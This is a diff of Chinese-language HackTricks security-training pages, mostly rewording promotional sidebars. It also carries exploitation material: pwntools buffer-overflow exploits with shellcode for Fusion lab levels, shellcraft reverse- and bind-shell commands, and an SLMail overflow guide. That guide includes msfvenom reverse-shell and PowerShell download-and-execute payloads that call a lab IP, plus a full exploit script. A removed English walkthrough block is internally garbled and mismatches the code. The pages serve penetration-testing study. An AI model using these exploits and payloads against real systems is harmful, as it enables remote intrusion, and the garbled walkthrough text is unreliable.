* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
如果您可以使用RC4加密明文,只需使用加密函数即可解密由该RC4加密的任何内容(使用相同的密码)。
|
||||
如果你能以某种方式使用RC4加密明文,那么你可以仅使用加密函数解密由该RC4加密的任何内容(使用相同的密码)。
|
||||
|
||||
如果您可以加密已知明文,还可以提取密码。更多参考资料可以在HTB Kryptos机器中找到:
|
||||
如果你能加密一个已知的明文,你也可以提取密码。更多参考资料可以在HTB Kryptos机器中找到:
|
||||
|
||||
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
|
||||
|
||||
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,29 +1,20 @@
|
|||
# 电子邮件漏洞
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
##
|
||||
|
||||
##
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,23 +1,24 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) **和** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github仓库提交PR来分享黑客技巧。**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# Level00
|
||||
|
||||
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
|
||||
|
||||
1. 获取修改EIP的偏移量
|
||||
1. 获取偏移量以修改EIP
|
||||
2. 将shellcode地址放入EIP
|
||||
```python
|
||||
from pwn import *
|
||||
|
@ -45,24 +46,6 @@ r.send(buf)
|
|||
r.interactive()
|
||||
```
|
||||
# Level01
|
||||
|
||||
## Fusion
|
||||
|
||||
### Basic ESP
|
||||
|
||||
#### Introduction
|
||||
|
||||
In this level, we will be exploiting a basic ESP overwrite vulnerability in the `fusion` binary. The goal is to redirect code execution to the `getpath` function in order to get a shell.
|
||||
|
||||
#### Walkthrough
|
||||
|
||||
1. **Find the Offset**: We will use GDB to find the offset needed to overwrite the return address. Run `gdb fusion` and disassemble the `main` function. Set a breakpoint at the `get` function call and run the binary with a pattern as input. Retrieve the offset using `pattern offset`.
|
||||
|
||||
2. **Craft the Payload**: We will craft a payload that overwrites the return address with the address of the `getpath` function. Use Python to generate the payload and save it to a file.
|
||||
|
||||
3. **Exploit**: Send the payload to the binary using a method of your choice (e.g., input redirection, piping, etc.) and get a shell by redirecting code execution to the `getpath` function.
|
||||
|
||||
By following these steps, you should be able to successfully exploit the basic ESP overwrite vulnerability in the `fusion` binary and gain a shell.
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
|
@ -88,16 +71,17 @@ buf += "\x65\xd9\x0f\x01"
|
|||
r.send(buf)
|
||||
r.interactive()
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,27 +1,28 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
```
|
||||
pip3 install pwntools
|
||||
```
|
||||
# Pwn asm
|
||||
|
||||
从行或文件获取操作码。
|
||||
从一行或文件中获取操作码。
|
||||
```
|
||||
pwn asm "jmp esp"
|
||||
pwn asm -i <filepath>
|
||||
```
|
||||
**可选项:**
|
||||
**可以选择:**
|
||||
|
||||
* 输出类型 (原始,十六进制,字符串,elf)
|
||||
* 输出文件上下文 (16,32,64,linux,windows...)
|
||||
|
@ -43,7 +44,7 @@ pwn checksec <executable>
|
|||
pwn cyclic 3000
|
||||
pwn cyclic -l faad
|
||||
```
|
||||
**可选项:**
|
||||
**可以选择:**
|
||||
|
||||
* 使用的字母表(默认为小写字符)
|
||||
* 唯一模式的长度(默认为4)
|
||||
|
@ -58,13 +59,15 @@ pwn debug --exec /bin/bash
|
|||
pwn debug --pid 1234
|
||||
pwn debug --process bash
|
||||
```
|
||||
**可选择:**
|
||||
**可选择的选项:**
|
||||
|
||||
* 通过可执行文件、名称或pid上下文(16,32,64,linux,windows...)
|
||||
* 通过可执行文件、名称或pid上下文(16、32、64位、Linux、Windows...)
|
||||
* 要执行的gdbscript
|
||||
* sysroot路径
|
||||
|
||||
# 禁用二进制文件的nx
|
||||
# 禁用NX
|
||||
|
||||
禁用二进制文件的NX
|
||||
```
|
||||
pwn disablenx <filepath>
|
||||
```
|
||||
|
@ -92,7 +95,7 @@ pwn elfdiff <file1> <file2>
|
|||
```bash
|
||||
pwn hex hola #Get hex of "hola" ascii
|
||||
```
|
||||
# Pwn phd
|
||||
# 利用 hexdump
|
||||
|
||||
获取十六进制转储
|
||||
```
|
||||
|
@ -118,7 +121,7 @@ pwn shellcraft -f hex amd64.linux.sh #Create in C and run
|
|||
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
|
||||
pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
|
||||
```
|
||||
**可选项:**
|
||||
**可以选择:**
|
||||
|
||||
* shellcode和shellcode的参数
|
||||
* 输出文件
|
||||
|
@ -126,12 +129,12 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
|
|||
* 调试(将dbg附加到shellcode)
|
||||
* 在代码之前设置调试陷阱
|
||||
* 在代码之后
|
||||
* 避免使用操作码(默认: 非空和换行符)
|
||||
* 避免使用操作码(默认:非空和换行符)
|
||||
* 运行shellcode
|
||||
* 彩色/无彩色
|
||||
* 列出系统调用
|
||||
* 列出可能的shellcode
|
||||
* 生成ELF作为共享库
|
||||
* 生成作为共享库的ELF
|
||||
|
||||
# Pwn模板
|
||||
|
||||
|
@ -153,16 +156,17 @@ pwn unhex 686f6c61
|
|||
```
|
||||
pwn update
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,24 +1,25 @@
|
|||
# Windows Exploiting (Basic Guide - OSCP lvl)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## **开始安装SLMail服务**
|
||||
## **开始安装 SLMail 服务**
|
||||
|
||||
## 重新启动SLMail服务
|
||||
## 重新启动 SLMail 服务
|
||||
|
||||
每次需要**重新启动SLMail服务**时,您可以使用Windows控制台执行以下操作:
|
||||
每次需要**重新启动 SLMail 服务**时,您可以使用 Windows 控制台执行以下操作:
|
||||
```
|
||||
net start slmail
|
||||
```
|
||||
|
@ -66,7 +67,7 @@ print "Could not connect to "+ip+":"+port
|
|||
|
||||
## 创建一个模式来修改 EIP
|
||||
|
||||
该模式的大小应与先前用于中断服务的缓冲区大小相同。
|
||||
该模式的大小应与您先前用于中断服务的缓冲区大小相同。
|
||||
|
||||
![](<../.gitbook/assets/image (26) (1) (1).png>)
|
||||
```
|
||||
|
@ -86,7 +87,7 @@ print "Could not connect to "+ip+":"+port
|
|||
```
|
||||
看起来**我们可以修改缓冲区中偏移为2606的EIP**。
|
||||
|
||||
检查一下修改漏洞利用的缓冲区:
|
||||
检查一下修改 exploit 的缓冲区:
|
||||
```
|
||||
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
|
||||
```
|
||||
|
@ -140,13 +141,13 @@ badchars = (
|
|||
)
|
||||
buffer = 'A'*2606 + 'BBBB' + badchars
|
||||
```
|
||||
badchars 从 0x01 开始,因为 0x00 几乎总是不好的。
|
||||
badchars 从 0x01 开始,因为 0x00 几乎总是有问题。
|
||||
|
||||
重复执行利用程序,使用新的缓冲区删除发现无用的字符:。
|
||||
重复执行利用程序,使用这个新的缓冲区删除发现无用的字符:。
|
||||
|
||||
例如:
|
||||
|
||||
在这种情况下,您可以看到**不应使用字符 0x0A**(因为内存中没有保存字符 0x09)。
|
||||
在这种情况下,您可以看到**不应使用字符 0x0A**(因为内存中没有保存任何内容,因为字符 0x09)。
|
||||
|
||||
![](<../.gitbook/assets/image (33) (1).png>)
|
||||
|
||||
|
@ -160,17 +161,17 @@ badchars 从 0x01 开始,因为 0x00 几乎总是不好的。
|
|||
```
|
||||
!mona modules #Get protections, look for all false except last one (Dll of SO)
|
||||
```
|
||||
您将**列出内存映射**。搜索具有以下特征的某些DLL:
|
||||
你将**列出内存映射**。搜索一些具有以下特征的 DLL:
|
||||
|
||||
- **重新基址(Rebase):False**
|
||||
- **SafeSEH:False**
|
||||
- **ASLR:False**
|
||||
- **NXCompat:False**
|
||||
- **OS DLL:True**
|
||||
- **Rebase: False**
|
||||
- **SafeSEH: False**
|
||||
- **ASLR: False**
|
||||
- **NXCompat: False**
|
||||
- **OS Dll: True**
|
||||
|
||||
![](<../.gitbook/assets/image (35) (1).png>)
|
||||
|
||||
现在,在这段内存中,您应该找到一些JMP ESP字节,为此执行:
|
||||
现在,在这段内存中,你应该找到一些 JMP ESP 字节,为此执行:
|
||||
```
|
||||
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
|
||||
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
|
||||
|
@ -179,16 +180,16 @@ badchars 从 0x01 开始,因为 0x00 几乎总是不好的。
|
|||
|
||||
![](<../.gitbook/assets/image (36) (1).png>)
|
||||
|
||||
**在这种情况下,例如: \_0x5f4a358f**\_
|
||||
**在这种情况下,例如: \_0x5f4a358f**\_
|
||||
|
||||
## 创建 shellcode
|
||||
```
|
||||
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
|
||||
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
|
||||
```
|
||||
如果利用漏洞没有生效但应该生效(可以通过ImDebg看到已经到达shellcode),尝试创建其他shellcode(msfvenom使用相同参数创建不同的shellcode)。
|
||||
如果利用漏洞没有生效但应该生效(可以通过 ImDebg 看到已经到达 shellcode),尝试创建其他 shellcode(使用 msfvenom 为相同参数创建不同的 shellcode)。
|
||||
|
||||
在shellcode开头**添加一些NOPS**,并使用它和返回地址跳转到JMP ESP,完成利用:
|
||||
在 shellcode 的开头**添加一些 NOPS**,并使用它和返回地址跳转到 JMP ESP,完成利用:
|
||||
```bash
|
||||
#!/usr/bin/python
|
||||
|
||||
|
@ -247,16 +248,17 @@ print "Could not connect to "+ip+":"+port
|
|||
```
|
||||
EXITFUNC=thread -e x86/shikata_ga_nai
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,50 +1,50 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
